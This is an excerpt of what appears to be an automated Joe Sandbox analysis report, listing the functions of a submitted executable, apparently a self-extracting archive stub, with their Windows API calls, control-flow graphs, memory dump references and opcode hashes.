                                                                                                                    control_flow_graph 1073 e4dbde-e4dc09 call e4ec50 SetEnvironmentVariableW call e40371 1077 e4dc0e-e4dc12 1073->1077 1078 e4dc14-e4dc18 1077->1078 1079 e4dc36-e4dc38 1077->1079 1080 e4dc21-e4dc28 call e4048d 1078->1080 1083 e4dc1a-e4dc20 1080->1083 1084 e4dc2a-e4dc30 SetEnvironmentVariableW 1080->1084 1083->1080 1084->1079
                                                                                                                    APIs
                                                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00E4DBF4
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00E4DC30
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentVariable
                                                                                                                    • String ID: sfxcmd$sfxpar
                                                                                                                    • API String ID: 1431749950-3493335439
                                                                                                                    • Opcode ID: ec1dd11593f3fe231144adb55831454e990680d428601e6a2b3c2ffe4e3ddca9
                                                                                                                    • Instruction ID: 65e26d0535a20c871489fdaf4592d8bc7f0e838b34cd4bcf0a3315910450b59e
                                                                                                                    • Opcode Fuzzy Hash: ec1dd11593f3fe231144adb55831454e990680d428601e6a2b3c2ffe4e3ddca9
                                                                                                                    • Instruction Fuzzy Hash: F1F0A7B25052246ACB201F95BC46BFB7B98AF067C1B041411FD85B6152D6F08940D6A0
                                                                                                                    Function 00E39785 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 1085 e39785-e39791 1086 e39793-e3979b GetStdHandle 1085->1086 1087 e3979e-e397b5 ReadFile 1085->1087 1086->1087 1088 e39811 1087->1088 1089 e397b7-e397c0 call e398bc 1087->1089 1090 e39814-e39817 1088->1090 1093 e397c2-e397ca 1089->1093 1094 e397d9-e397dd 1089->1094 1093->1094 1095 e397cc 1093->1095 1096 e397df-e397e8 GetLastError 1094->1096 1097 e397ee-e397f2 1094->1097 1098 e397cd-e397d7 call e39785 1095->1098 1096->1097 1099 e397ea-e397ec 1096->1099 1100 e397f4-e397fc 1097->1100 1101 e3980c-e3980f 1097->1101 1098->1090 1099->1090 1100->1101 1103 e397fe-e39807 GetLastError 1100->1103 1101->1090 1103->1101 1105 e39809-e3980a 1103->1105 1105->1098
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 00E39795
                                                                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00E397AD
                                                                                                                    • GetLastError.KERNEL32 ref: 00E397DF
                                                                                                                    • GetLastError.KERNEL32 ref: 00E397FE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$FileHandleRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2244327787-0
                                                                                                                    • Opcode ID: cd53c66b8c03f0a497ef58059c8cfb60ebbc6a097099c830a043f99b356a4dd8
                                                                                                                    • Instruction ID: 745668726975221864c187ea305e9b19621905fe6bd2a01a289375ddb6a613da
                                                                                                                    • Opcode Fuzzy Hash: cd53c66b8c03f0a497ef58059c8cfb60ebbc6a097099c830a043f99b356a4dd8
                                                                                                                    • Instruction Fuzzy Hash: F011C231914204EBCF245F35D80CAAA3FA9FB82364F10952AF416B51D2D7F48E48DB61
                                                                                                                    Function 00E5AD34 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00E53F73,00000000,00000000,?,00E5ACDB,00E53F73,00000000,00000000,00000000,?,00E5AED8,00000006,FlsSetValue), ref: 00E5AD66
                                                                                                                    • GetLastError.KERNEL32(?,00E5ACDB,00E53F73,00000000,00000000,00000000,?,00E5AED8,00000006,FlsSetValue,00E67970,FlsSetValue,00000000,00000364,?,00E598B7), ref: 00E5AD72
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00E5ACDB,00E53F73,00000000,00000000,00000000,?,00E5AED8,00000006,FlsSetValue,00E67970,FlsSetValue,00000000), ref: 00E5AD80
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3177248105-0
                                                                                                                    • Opcode ID: f12eb6c73058e96a1815d4d2da16cefb6f66db7ba52abedeb18d22de1c6d3565
                                                                                                                    • Instruction ID: b664287ee9d0980668875e84149b7ab1e8c66a1b14bde7071ad15e34716c1ab2
                                                                                                                    • Opcode Fuzzy Hash: f12eb6c73058e96a1815d4d2da16cefb6f66db7ba52abedeb18d22de1c6d3565
                                                                                                                    • Instruction Fuzzy Hash: D6012432201226AFC7216E79AC44A977B78AF447AB7191B30FD06F3560C720C80CC7E1
                                                                                                                    Function 00E5BA27 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E597E5: GetLastError.KERNEL32(?,00E71030,00E54674,00E71030,?,?,00E53F73,00000050,?,00E71030,00000200), ref: 00E597E9
                                                                                                                      • Part of subcall function 00E597E5: _free.LIBCMT ref: 00E5981C
                                                                                                                      • Part of subcall function 00E597E5: SetLastError.KERNEL32(00000000,?,00E71030,00000200), ref: 00E5985D
                                                                                                                      • Part of subcall function 00E597E5: _abort.LIBCMT ref: 00E59863
                                                                                                                      • Part of subcall function 00E5BB4E: _abort.LIBCMT ref: 00E5BB80
                                                                                                                      • Part of subcall function 00E5BB4E: _free.LIBCMT ref: 00E5BBB4
                                                                                                                      • Part of subcall function 00E5B7BB: GetOEMCP.KERNEL32(00000000,?,?,00E5BA44,?), ref: 00E5B7E6
                                                                                                                    • _free.LIBCMT ref: 00E5BA9F
                                                                                                                    • _free.LIBCMT ref: 00E5BAD5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorLast_abort
                                                                                                                    • String ID: p
                                                                                                                    • API String ID: 2991157371-2678736219
                                                                                                                    • Opcode ID: 2a3b81022c5737c53138bb67dd087b3d01f6a63c3584fc257f4b795b60f37c5f
                                                                                                                    • Instruction ID: 530a08ac9986511dc3991a7b42c180af950e5d3041d7afb258db2cfdc94013b7
                                                                                                                    • Opcode Fuzzy Hash: 2a3b81022c5737c53138bb67dd087b3d01f6a63c3584fc257f4b795b60f37c5f
                                                                                                                    • Instruction Fuzzy Hash: 74312731900209AFDB10EFA9D441B9DB7F5EF40326F21589AEC04BB2A3EB725D48CB50
                                                                                                                    Function 00E4E528 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: ($PDu<
                                                                                                                    • API String ID: 1269201914-2719109745
                                                                                                                    • Opcode ID: d4d691c59c41e946a56c743e0015ff4016318cf3121ad808b321a69ab58ee8fe
                                                                                                                    • Instruction ID: 53edf94467aa68d14482e971276ff5668dff1b8ae7dfd7023b502f5bb16a4ca9
                                                                                                                    • Opcode Fuzzy Hash: d4d691c59c41e946a56c743e0015ff4016318cf3121ad808b321a69ab58ee8fe
                                                                                                                    • Instruction Fuzzy Hash: 89B012C16981407C390861197D03C7F454DD4C5F10330B02EF405F0680E8811C010532
                                                                                                                    Function 00E4E532 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E51F
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID: 2$PDu<
                                                                                                                    • API String ID: 1269201914-683690134
                                                                                                                    • Opcode ID: 73b994899727c5eefab80e8ea20ff8c209646d2977440b92e52c199a6b9bce84
                                                                                                                    • Instruction ID: 678ecc747c43b8668b9d7585e35119373feaf38d0aec9c847fa1b9df8749876f
                                                                                                                    • Opcode Fuzzy Hash: 73b994899727c5eefab80e8ea20ff8c209646d2977440b92e52c199a6b9bce84
                                                                                                                    • Instruction Fuzzy Hash: 31B012C16981007D390861197C03D7F014DE4C5F10330702EF405F0680E8801C000532
                                                                                                                    Function 00E39F7A Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00E3D343,00000001,?,?,?,00000000,00E4551D,?,?,?), ref: 00E39F9E
                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00E4551D,?,?,?,?,?,00E44FC7,?), ref: 00E39FE5
                                                                                                                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00E3D343,00000001,?,?), ref: 00E3A011
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileWrite$Handle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4209713984-0
                                                                                                                    • Opcode ID: c0020dea119e109e3999f167e62c33f706f6a0e0d4beaac1d2bc0aa3ca20eb47
                                                                                                                    • Instruction ID: 608a9a8c7caff9685b3c555ed349378c57581a7572a24a4ce88ad53c27ba0e5e
                                                                                                                    • Opcode Fuzzy Hash: c0020dea119e109e3999f167e62c33f706f6a0e0d4beaac1d2bc0aa3ca20eb47
                                                                                                                    • Instruction Fuzzy Hash: 84319F31208305AFDB18CF24D81CBBA7BA5EB84755F045529F581BB290C7B59D88CBA2
                                                                                                                    Function 00E3A2B2 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00E3C27E: _wcslen.LIBCMT ref: 00E3C284
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A2D9
                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A30C
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00E3A175,?,00000001,00000000,?,?), ref: 00E3A329
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2260680371-0
                                                                                                                    • Opcode ID: 78fd7a44bdb192d56b49046f11c99cabed33f9143314d4ae263da8fe1b6291c8
                                                                                                                    • Instruction ID: b20eaf32f858f14a806f082d327ea5ad95830285cc581e1104e2b2168ab01c88
                                                                                                                    • Opcode Fuzzy Hash: 78fd7a44bdb192d56b49046f11c99cabed33f9143314d4ae263da8fe1b6291c8
                                                                                                                    • Instruction Fuzzy Hash: C601B5315002106AEF21AB759C4DFEE3B88AF09784F0C6434F981F6091D754CAC5C6B2
                                                                                                                    Function 00E5B893 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00E5B8B8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Info
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1807457897-3916222277
                                                                                                                    • Opcode ID: f6064bbce09ae509fdcc883d417fb6e83594383859d48880812548d5302d59ba
                                                                                                                    • Instruction ID: ef363d73c38a3aea8428c8e35fb281b012dfe8746f4dab48c8af65a05a811758
                                                                                                                    • Opcode Fuzzy Hash: f6064bbce09ae509fdcc883d417fb6e83594383859d48880812548d5302d59ba
                                                                                                                    • Instruction Fuzzy Hash: 9041FC7090438C9EDB218E25CC84BF6BBF9DB45305F1418EDD999A6142D335AA49CF60
                                                                                                                    Function 00E5AF6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00E5AFDD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String
                                                                                                                    • String ID: LCMapStringEx
                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                    • Opcode ID: 1c4f05900d321dba14c1924e91c934ae6709ba63257f78fd90025d6b0a5a44e1
                                                                                                                    • Instruction ID: 803512f285d2efaffee51bcf1b9a74fa5ad87e132ccd3b873c1cca0128c28902
                                                                                                                    • Opcode Fuzzy Hash: 1c4f05900d321dba14c1924e91c934ae6709ba63257f78fd90025d6b0a5a44e1
                                                                                                                    • Instruction Fuzzy Hash: 42014C32644209BFCF129F91EC01DEE7FA2EF48795F054654FE1435160C6728931EB91
                                                                                                                    Function 00E5AF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00E5A56F), ref: 00E5AF55
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                                                    • String ID: InitializeCriticalSectionEx
                                                                                                                    • API String ID: 2593887523-3084827643
                                                                                                                    • Opcode ID: 781a3025a302171d34ba12beee4f943463e16912e40c9cb1a41cef88b86b4b70
                                                                                                                    • Instruction ID: 26f64f842be19edaf7f4398845cf96a272ee6041c46bf2d8d5ffa3434b65989d
                                                                                                                    • Opcode Fuzzy Hash: 781a3025a302171d34ba12beee4f943463e16912e40c9cb1a41cef88b86b4b70
                                                                                                                    • Instruction Fuzzy Hash: ECF05931685208BFCF125F21EC02C9EBFE0EF44B92B014168FC087A260DA715E149795
                                                                                                                    Function 00E5ADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Alloc
                                                                                                                    • String ID: FlsAlloc
                                                                                                                    • API String ID: 2773662609-671089009
                                                                                                                    • Opcode ID: 56823838e8a39da5cd8d6017f552e135606bd25a2172c779ed8d381afe17ed62
                                                                                                                    • Instruction ID: 9a64b607ef67116a661f530bb191ec1017b1de15b43737c60e56182e84d84c81
                                                                                                                    • Opcode Fuzzy Hash: 56823838e8a39da5cd8d6017f552e135606bd25a2172c779ed8d381afe17ed62
                                                                                                                    • Instruction Fuzzy Hash: CDE055306813087FC301AB2AFC0296EBBE0CB54BA6B0222A9FC00B7240CDB05E4483C6
                                                                                                                    Function 00E4E1EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E4E1E3
                                                                                                                      • Part of subcall function 00E4E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E4E8D0
                                                                                                                      • Part of subcall function 00E4E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E4E8E1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1648952665.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1648938445.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648983426.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E6E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1648998645.0000000000E92000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1649047013.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                                    • Opcode ID: 2f576ffed9d8c9e967bca60ba925cf08ce931c2bd47148d70eede396b5c59a59
                                                                                                                    • Instruction ID: befb4a8d4bd398b2f455f77b81f4e0ad58c45ac12a7f45f168173ff6b1e4c232
                                                                                                                    • Opcode Fuzzy Hash: 2f576ffed9d8c9e967bca60ba925cf08ce931c2bd47148d70eede396b5c59a59
